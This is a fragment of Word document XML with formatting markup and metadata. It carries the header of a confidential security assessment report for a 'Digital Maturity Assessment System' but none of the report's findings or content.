              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="7EB8E8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Security Assessment Report — Digital Maturity Assessment System — 2026</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B2A4A"/>
              <w:sz w:val="16"/>
              <w:szCs w:val="16"/>
            </w:rPr>
            <w:t xml:space="preserve">SECURITY ASSESSMENT REPORT — CONFIDENTIAL</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Digital Maturity Assessment System | Mar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2026-03-08T21:56:39.938Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-08T21:56:39.938Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>